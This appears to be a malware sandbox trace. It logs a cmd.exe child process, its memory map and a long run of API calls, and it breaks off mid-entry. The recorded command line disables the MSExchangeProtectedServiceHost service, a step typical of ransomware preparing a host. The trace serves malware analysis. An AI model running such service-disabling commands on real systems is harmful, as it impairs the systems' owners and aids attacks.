(_Code=1060) Thread: id = 508 os_tid = 0xc64 Process: id = "152" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3f92f000" os_pid = "0x1f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeProtectedServiceHost start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8149 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8150 start_va = 0x7f0000 end_va = 0x47effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 8151 start_va = 0x47f0000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 8152 start_va = 0x4810000 end_va = 0x4811fff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 8153 start_va = 0x4820000 end_va = 0x4833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004820000" filename = "" Region: id = 8154 start_va = 0x4840000 end_va = 0x487ffff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 8155 start_va = 0x4880000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 8156 start_va = 0x4980000 end_va = 0x4983fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004980000" filename = "" Region: id = 8157 start_va = 0x4990000 end_va = 0x4990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004990000" filename = "" Region: id = 8158 start_va = 0x49a0000 end_va = 0x49a1fff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 8159 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8160 start_va = 0x7f8b0000 end_va = 0x7f8d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8b0000" filename = "" Region: id = 8161 start_va = 0x7f8d6000 end_va = 0x7f8d6fff entry_point = 0x0 region_type = private name = "private_0x000000007f8d6000" filename = "" Region: id = 8162 start_va = 0x7f8dc000 end_va = 0x7f8defff entry_point = 0x0 region_type = private name = "private_0x000000007f8dc000" filename = "" Region: id = 8163 start_va = 0x7f8df000 end_va = 0x7f8dffff entry_point = 0x0 region_type = private name = "private_0x000000007f8df000" filename = "" Region: id = 8164 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8165 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8166 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8167 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8168 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8169 start_va = 0x4b30000 end_va = 0x4b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 8170 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8171 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8172 start_va = 0x4c20000 end_va = 0x4d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 8173 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8214 start_va = 0x47f0000 end_va = 0x47fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047f0000" filename = "" Region: id = 8215 start_va = 0x4810000 end_va = 0x481ffff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 8216 start_va = 0x49b0000 end_va = 0x4a6dfff entry_point = 0x49b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8217 start_va = 0x4a70000 end_va = 0x4aaffff entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 8218 start_va = 0x4d20000 end_va = 0x4e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 8219 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8220 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8221 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8222 start_va = 0x7f7b0000 end_va = 0x7f8affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7b0000" filename = "" Region: id = 8223 start_va = 0x7f8d9000 end_va = 0x7f8dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f8d9000" filename = "" Region: id = 8224 start_va = 0x4800000 end_va = 0x4803fff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 8225 start_va = 0x4ab0000 end_va = 0x4ab3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 8226 start_va = 0x4e20000 end_va = 0x5156fff entry_point = 0x4e20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 509 os_tid = 0xc24 [0132.225] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0132.225] __set_app_type (_Type=0x1) [0132.225] __p__fmode () returned 0x77ac4d6c [0132.225] __p__commode () returned 0x77ac5b1c [0132.225] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0132.225] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0132.225] GetCurrentThreadId () returned 0xc24 [0132.225] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc24) returned 0x84 [0132.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.225] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0132.226] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.228] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.228] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x497f7bc | out: phkResult=0x497f7bc*=0x0) returned 0x2 [0132.228] VirtualQuery (in: lpAddress=0x497f7c3, lpBuffer=0x497f774, dwLength=0x1c | out: lpBuffer=0x497f774*(BaseAddress=0x497f000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.228] VirtualQuery (in: lpAddress=0x4880000, lpBuffer=0x497f774, dwLength=0x1c | out: lpBuffer=0x497f774*(BaseAddress=0x4880000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.228] VirtualQuery (in: lpAddress=0x4881000, lpBuffer=0x497f774, dwLength=0x1c | out: lpBuffer=0x497f774*(BaseAddress=0x4881000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.228] VirtualQuery (in: lpAddress=0x4883000, lpBuffer=0x497f774, dwLength=0x1c | out: lpBuffer=0x497f774*(BaseAddress=0x4883000, AllocationBase=0x4880000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.228] VirtualQuery (in: lpAddress=0x4980000, lpBuffer=0x497f774, dwLength=0x1c | out: lpBuffer=0x497f774*(BaseAddress=0x4980000, AllocationBase=0x4980000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.228] GetConsoleOutputCP () returned 0x1b5 [0132.228] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.228] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0132.228] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.228] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0132.229] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.229] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.229] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.229] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.229] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.229] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.229] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.229] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0132.229] GetEnvironmentStringsW () returned 0x4c27dc8* [0132.229] FreeEnvironmentStringsA (penv="A") returned 1 [0132.230] GetEnvironmentStringsW () returned 0x4c27dc8* [0132.230] FreeEnvironmentStringsA (penv="A") returned 1 [0132.230] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x497e720 | out: phkResult=0x497e720*=0x94) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x0, lpData=0x497e72c*=0x68, lpcbData=0x497e728*=0x1000) returned 0x2 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x1, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x0, lpData=0x497e72c*=0x1, lpcbData=0x497e728*=0x1000) returned 0x2 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x0, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x40, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x40, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x0, lpData=0x497e72c*=0x40, lpcbData=0x497e728*=0x1000) returned 0x2 [0132.230] RegCloseKey (hKey=0x94) returned 0x0 [0132.230] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x497e720 | out: phkResult=0x497e720*=0x94) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x0, lpData=0x497e72c*=0x40, lpcbData=0x497e728*=0x1000) returned 0x2 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x1, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x0, lpData=0x497e72c*=0x1, lpcbData=0x497e728*=0x1000) returned 0x2 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x0, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x9, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x4, lpData=0x497e72c*=0x9, lpcbData=0x497e728*=0x4) returned 0x0 [0132.230] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x497e724, lpData=0x497e72c, lpcbData=0x497e728*=0x1000 | out: lpType=0x497e724*=0x0, lpData=0x497e72c*=0x9, lpcbData=0x497e728*=0x1000) returned 0x2 [0132.230] RegCloseKey (hKey=0x94) returned 0x0 [0132.230] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29835 [0132.230] srand (_Seed=0x5ad29835) [0132.230] GetCommandLineW () returned="/c sc config MSExchangeProtectedServiceHost start= disabled" [0132.230] GetCommandLineW () returned="/c sc config MSExchangeProtectedServiceHost start= disabled" [0132.230] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.231] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c29d20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0132.231] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.231] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.231] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.231] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.231] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.231] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.231] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.231] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.231] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.231] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0132.231] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.231] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.231] GetEnvironmentStringsW () returned 0x4c27dc8* [0132.231] FreeEnvironmentStringsA (penv="A") returned 1 [0132.231] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.231] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.231] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.231] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.231] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.231] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.231] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.231] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.231] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.231] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.231] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x497f4f8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.231] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x497f4f8, lpFilePart=0x497f4f0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x497f4f0*="Desktop") returned 0x1d [0132.232] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.232] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x497f278 | out: lpFindFileData=0x497f278) returned 0x4c205c8 [0132.232] FindClose (in: hFindFile=0x4c205c8 | out: hFindFile=0x4c205c8) returned 1 [0132.232] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x497f278 | out: lpFindFileData=0x497f278) returned 0x4c205c8 [0132.232] FindClose (in: hFindFile=0x4c205c8 | out: hFindFile=0x4c205c8) returned 1 [0132.232] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0132.232] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x497f278 | out: lpFindFileData=0x497f278) returned 0x4c205c8 [0132.232] FindClose (in: hFindFile=0x4c205c8 | out: hFindFile=0x4c205c8) returned 1 [0132.232] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0132.232] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0132.232] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0132.232] GetEnvironmentStringsW () returned 0x4c27dc8* [0132.232] FreeEnvironmentStringsA (penv="=") returned 1 [0132.232] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0132.233] GetConsoleOutputCP () returned 0x1b5 [0132.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.233] GetUserDefaultLCID () returned 0x409 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x497f628, cchData=128 | out: lpLCData="0") returned 2 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x497f628, cchData=128 | out: lpLCData="0") returned 2 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x497f628, cchData=128 | out: lpLCData="1") returned 2 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0132.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0132.233] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.234] GetConsoleTitleW (in: lpConsoleTitle=0x4c2aa88, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.234] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.234] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0132.234] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0132.234] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0132.235] _wcsicmp (_String1="sc", _String2=")") returned 74 [0132.235] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0132.235] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0132.235] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0132.235] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0132.235] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0132.235] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0132.236] GetConsoleTitleW (in: lpConsoleTitle=0x497f310, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.236] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.236] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.236] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.236] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.236] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.236] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.236] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.236] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.236] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.237] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.237] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.237] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.237] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.237] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.237] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.237] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.237] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.237] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.237] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.237] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.237] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.237] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.237] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.237] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.237] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.237] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.237] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.237] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.237] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.237] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.237] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.237] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.237] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.237] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.237] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.237] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.237] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.237] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.237] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.237] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.237] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.237] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.237] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.237] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.237] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.237] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.237] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.237] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.237] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.237] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.237] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.237] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.237] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.237] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.237] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.237] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.237] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.237] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.237] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.237] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.237] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.237] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.237] _wcsicmp 